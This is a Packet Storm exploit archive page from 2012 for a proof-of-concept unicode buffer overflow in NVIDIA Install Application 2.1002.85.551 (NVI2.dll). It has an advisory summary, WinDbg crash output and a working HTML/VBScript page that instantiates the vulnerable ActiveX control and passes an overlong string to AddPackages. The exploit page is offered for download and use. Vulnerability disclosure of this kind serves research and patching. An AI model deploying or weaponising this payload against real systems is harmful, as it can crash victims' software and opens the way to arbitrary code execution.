exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NVIDIA Install Application 2.1002.85.551 Buffer Overflow

NVIDIA Install Application 2.1002.85.551 Buffer Overflow
Posted Dec 6, 2012
Authored by LiquidWorm | Site zeroscience.mk

NVIDIA Install Application version 2.1002.85.551 (NVI2.dll) unicode buffer overflow proof of concept exploit. The vulnerability is caused due to a boundary error in NVI2.DLL when handling the value assigned to the 'pDirectory' string variable in the 'AddPackages' function and can be exploited to cause a unicode buffer overflow by inserting an overly long array of data which may lead to execution of arbitrary code.

tags | exploit, overflow, arbitrary, proof of concept
SHA-256 | 940daccf645bccea74ea3412d042b5f53742c5a6c98c1ca9c1a5d0721a725f9e

NVIDIA Install Application 2.1002.85.551 Buffer Overflow

Change Mirror Download
<!--

NVIDIA Install Application 2.1002.85.551 (NVI2.dll) Unicode Buffer Overflow PoC


Vendor: NVIDIA Corporation
Product web page: http://www.nvidia.com
Affected version: 2.1002.85.551 (Driver: 306.97)

Summary: NVIDIA install core application for Windows.

Desc: The vulnerability is caused due to a boundary error in NVI2.DLL
when handling the value assigned to the 'pDirectory' string variable
in the 'AddPackages' function and can be exploited to cause a unicode
buffer overflow by inserting an overly long array of data which may
lead to execution of arbitrary code.

----------------------------------------------------------------------------------

(19ac.21d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=004142a0 ebx=01a83610 ecx=24194ce0 edx=00000002 esi=00000000 edi=00000000
eip=5e26d7fc esp=0023ebe8 ebp=0023ec84 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
C:\Program Files\NVIDIA Corporation\Installer2\installer.2\NVI2.DLL -
NVI2!DllInstall+0xbf5c:
5e26d7fc 8b37 mov esi,dword ptr [edi] ds:0023:00000000=????????
0:000> d eax+40
004142e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
004142f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00414300 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00414310 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00414320 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00414330 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00414340 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00414350 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.

----------------------------------------------------------------------------------


Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit

- Drivers bundle used: 306.97-desktop-win8-win7-winvista-32bit-english-whql.exe


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience



Advisory ID: ZSL-2012-5116
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5116.php


02.12.2012

-->


<html><body>
<object classid='clsid:A9C8F210-55EB-4849-8807-EC49C5389A79' id='attack' />
<script>
pDirectory=String(2068, "A")
attack.AddPackages pDirectory
</script>
</body></html>
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close